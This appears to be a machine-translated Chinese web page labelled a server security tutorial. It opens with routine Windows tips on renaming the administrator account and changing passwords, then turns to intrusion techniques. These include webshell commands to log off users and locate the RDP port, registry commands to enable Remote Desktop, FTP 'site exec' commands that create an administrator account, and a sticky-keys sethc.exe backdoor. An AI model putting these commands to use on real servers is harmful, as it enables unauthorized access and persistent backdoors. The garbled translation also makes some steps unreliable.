Server Security Tutorials

"Miscellaneous Tips" Server security tutorial

One. Change the server default user name

Click Start menu → run gpedit.msc (Group Policy manager) → Computer Configuration →windows settings → security settings → Local policies → security options → Here's the last item → Rename the system administrator account (double-click) → in the local policy settings, enter the username you want, then OK.

Two. Change server password

To remotely modify the server's user password, there are three methods, as follows:

First, select "My Computer"-right button "manage"-"Local Users and Groups"-"user" to find your administrator account, right-click to set the password. That prompts windows with a security warning that doesn't affect your use. If you are really worried about data loss, then it is recommended that you restart your computer after you change it so that you can make sure that you do not lose it after you change your password.

Second, start->windows security, so it is as if the Remote desktop simultaneously pressed
The Ctrl+atl+del effect is the same, point change password, only so that the NTFS file system encryption information will not be lost.

Third, press the Ctrl+alt+end key instead of the Ctrl+alt+delete key.

It is recommended to use the second and third methods to open account management directly and then change the password, which is what you do when you forget your password.

 

three. Webshell Logoff System User method

First, enter the ID of the user to query
Then enter log out of the user. Logoff ID

Four. CMD to open the 3389 command

Method One: REG ADD hklm\system\currentcontrolset\control\terminal "" Server/v fdenytsconnections/t reg_dword/d 00000000/f

Method Two: Build the bat file, type the following code, run on the server with EXECUTE permission!

echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "Fdenytsconnections" =dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\wds\rdpwd\tds\tcp]>>3389.reg
echo "PortNumber" =dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\winstations\rdp-tcp]>>3389.reg
echo "PortNumber" =dword:00000d3d>>3389.reg
REGEDIT/S 3389.reg
Del 3389.reg

Five. Webshell See what the administrator has changed to 3389

REG query Hklm\system\currentcontrolset\control\terminal "" Server\winstations\rdp-tcp/v portnumber This command is to see how much of the port opened by Remote Desktop Connection is generally the default display is 0xd3d 3389. In fact, the two commonly-used CMD commands can be finalized. First Use Tasklist/svc Image name PID Service ========================= ====== ============================================= System Idle Process 0 N/A System 4 N/A Smss.exe 704 Csrss.exe 772 Winlogon.exe 796 Services.exe 840 Eventlog, Plugplay Lsass.exe 852 PolicyAgent, ProtectedStorage, SAMSS Svchost.exe 1028 Dcomlaunch, TermService,//Here TermService is the response of the 3389 service, remember the process of the PID : 1028 Svchost.exe 1092 RpcSs Svchost.exe 1180 Audiosrv, Browser, Cryptsvc, Dhcp, Dmserver, EventSystem, Fastuserswitchingcompatibility, LanManServer, LanmanWorkstation, Netman, Nla, RasMan, Seclogon, SENS, SharedAccess, ShellHWDetection, TAPISRV, Themes, Trkwks, W32Time, WinMgmt, Wscsvc, Wuauserv, WZCSVC Svchost.exe 1260 DnsCache Svchost.exe 1336 LmHosts, SSDPSRV, WebClient Spoolsv.exe 1416 Spooler Explorer.EXE 1788 Vsnpstd3.exe 1948 Egui.exe 1968 Ctfmon.exe 2044 Ekrn.exe 484 EKRN Svchost.exe 604 stisvc Wdfmgr.exe 620 UMWDF Alg.exe 324 ALG Iexplore.exe 2552 Cmd.exe 2236 Conime.exe 124 Wmiprvse.exe 292 Mstsc.exe 3580 Tasklist.exe 188 ==================================================================================================== Then use the netstat command to view the port number: Netstat/ano Active Connections Proto Local Address Foreign address State PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 1092 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5389 0.0.0.0:0 LISTENING 1028//This is the upper PID number 1028, which is the Remote Desktop-response port 5389. TCP 60.xxx.xxx.xxx:1349 220.xxx.xxx.xxx:8081 time_wait 0 TCP 60..xxx.xxx.xxx::1360 121.xxx.xxx.xxx:8449 time_wait 0 TCP 60..xxx.xxx.xxx::1525 121.xxx.xxx.xxx:80 time_wait 0 TCP 127.0.0.1:1030 0.0.0.0:0 LISTENING 324 TCP 127.0.0.1:1522 127.0.0.1:30606 time_wait 0 TCP 127.0.0.1:30606 0.0.0.0:0 LISTENING 484 TCP 127.0.0.1:30606 127.0.0.1:1520 time_wait 0 TCP 192.168.1.12:139 0.0.0.0:0 LISTENING 4 UDP 0.0.0.0:445 *:* 4 UDP 0.0.0.0:500 *:* 852 UDP 0.0.0.0:4500 *:* 852 UDP 60.xxx.xxx.xxx::123 *:* 1180 UDP 60.xxx.xxx.xxx::1900 *:* 1336 UDP 127.0.0.1:123 *:* 1180 UDP 127.0.0.1:1047 *:* 2552 UDP 127.0.0.1:1900 *:* 1336 UDP 192.168.1.12:123 *:* 1180 UDP 192.168.1.12:137 *:* 4 UDP 192.168.1.12:138 *:* 4 UDP 192.168.1.12:1900 *:* 1336 C:\>

six. FTP cmd series Command

Quote site EXEC NET user 381400744 381400744/add Add user

Quote site EXEC net localgroup Administrators 381400744/add user 381400744 to admin!

Quote site exec shutdown-r-T 0 remote restart Server

Quote site exec REG ADD hklm\system\currentcontrolset\control\terminal "" server/v fdenytsconnections/t reg_dword/d 0000 0000/f Remote open 3389 port

Quote site Exec tasklist/svc>>jilu.txt These two sentences, remote view administrator to change 3389 port to how much, automatically saved as a file named Jilu.txt!
Quote site EXEC Netstat/ano>>jilu.txt

Seven, summary of the classic right to mention skills

Method 1: Replace CMD and sethc directly with the shift backdoor call CMD

Copy%systemroot%\system32\cmd.exe%systemroot%\system32\sethc.exe/y
Copy%systemroot%\system32\sethc.exe%systemroot%\system32\dllcache\sethc.exe/y

After entering the login interface: Call Desktop Explorer

Server Security Tutorials